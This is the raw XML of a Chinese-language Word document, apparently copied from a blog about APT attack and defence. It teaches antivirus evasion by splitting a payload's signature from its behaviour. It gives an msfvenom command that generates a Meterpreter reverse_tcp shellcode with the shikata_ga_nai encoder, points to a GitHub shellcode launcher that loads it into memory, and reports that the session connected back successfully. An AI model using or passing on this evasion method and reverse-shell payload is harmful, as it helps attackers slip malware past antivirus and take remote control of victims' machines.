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ict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:264.600pt;width:467.400pt;height:330.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:698.400pt;width:467.400pt;height:90.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8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6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383838"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>专</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注APT攻击与防御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3783"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>poor.blogspot.com/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323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1388" w:firstLine="483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目前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的反病毒安全软件，常见有三种，一种基于特征，一种基于行为，一种基于云查</w:t>
      </w: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杀。</w:t>
      </w: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云查杀的特点基本也可以概括为特征查杀。无论是哪种，都是特别针对PE头文件的查</w:t>
      </w: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杀。尤其是</w:t>
      </w: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当payload文件越大的时候，特征越容易查杀。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1190" w:firstLine="483"/>
      </w:pP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既然知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>了目前的主流查杀方式，那么反制查杀，此篇采取特征与行为分离免杀。避免</w:t>
      </w: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PE头文件，并且分离行为，与特征</w:t>
      </w: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的综合免杀。适用于菜刀下等场景，也是我在基于</w:t>
      </w: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windows下为了更稳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定的一种常用手法。载入内存。</w:t>
      </w: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0x00:以msf为例：监听</w:t>
      </w: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端口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8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0x</w:t>
      </w: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001：这里的payload不采取生成pe文件，而采取shellcode方式，来借助第三方直接加载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到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>内存中。避免行为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="101" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="998" w:firstLine="0"/>
      </w:pP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msfvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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lhost=192.168.1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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lport=8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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-e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-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x86/shikata_ga_nai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>test.c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54.600pt;margin-top:216.600pt;width:467.400pt;height:64.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:320.399pt;width:388.800pt;height:378.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10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6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323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1148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0x002:既然是shellcode方式的payload，那么一定需要借助第三方来启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>动，加载到内存。执</w:t>
      </w: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行shellcode，自己写也不是很难，这里我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>借用一个github一个开源：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>ttps://github.com/clinicallyinane/shellcode_launcher/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="2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-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>作者的话：建议大家自己</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>写shellcode执行盒，相关代码网上非常成熟。如果遇到问题，随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1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以问我。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72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生成的payload大小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如下：476字节。还是X32位的payload。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4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国</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>内世界杀毒网：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54.600pt;margin-top:48.600pt;width:467.400pt;height:503.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11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09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国</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>际世界杀毒网：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454.200pt;margin-top:566.400pt;width:7.200pt;height:7.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId12" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:334.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:443.400pt;width:467.400pt;height:75.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14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18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上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>线成功。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82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5" w:lineRule="auto"/>
        <w:ind w:left="9599" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micr</w:t>
      </w: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opoor</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11920" w:h="16840"/>
      <w:pgMar w:header="0" w:footer="0"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 
	<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" />
	<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" />
	<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" /> 
	<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml" /> 
	<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" /> 
	<Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/7.jpeg" />
	<Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/8.jpeg" />
	<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/9.jpeg" />
	<Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/10.jpeg" />
	<Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/11.jpeg" />
	<Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/12.jpeg" />
	<Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/13.jpeg" />
	<Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/14.jpeg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2011-11-21T14:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-11-21T15:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>